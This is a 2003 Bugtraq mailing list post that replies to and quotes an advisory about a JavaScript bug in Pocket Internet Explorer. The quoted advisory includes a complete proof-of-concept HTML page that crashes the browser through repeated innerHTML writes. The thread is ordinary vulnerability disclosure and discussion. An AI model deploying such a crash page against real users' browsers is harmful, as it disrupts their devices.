Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: JS Bug makes it possible to deliberately crash Pocket PC IE (fwd)

From: angus () onnow net
Date: Fri, 3 Jan 2003 10:17:06 -0500
Can you be specific about what version of PIE you tested this vulnerability on?

If you look at the following web pages you will see that PIE only supports a
few HTML tags.

http://support.microsoft.com/default.aspx?scid=kb;en-us;Q161319
http://support.microsoft.com/default.aspx?scid=kb;EN-US;158479

Specifically the <SCRIPT> tag is not supported in PIE 1.0, 1.1 and 2.0. Only
PIE 3.0 supports the <SCRIPT> tag.

Does PIE 3.0 crash?


PROBLEM DESCRIPTION:
Calling a javascript from an object written to same page with the
object.innerHTML function causes Pocket Internet Explorer (PIE from now
on)
to crash.

SOFTWARE AFFECTED:
Only PIE is affected, "regular" IE will show the pages as intented.

EXAMPLE:
<html>
<head>
<title>Crash PIE</title>
<script language="Javascript">
function displayPage(page){
if(page=="onload"){
   main.innerHTML="<a href=\"#\"
onClick=\"displayPage('crash');\">Crash
me</a>";
}
if(page=="crash"){
   main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">You
are
going down!</a>";
}
}
</script>
</head>
<body onLoad="displayPage('onload');">
<hr>
<span id="main"></span>
</body></html>

SOLUTIONS:
no known patch available


Problem was reported to MS (Norway) 2nd of January 2003.


Chris
Previous By Date Next
Previous By Thread Next

Current thread: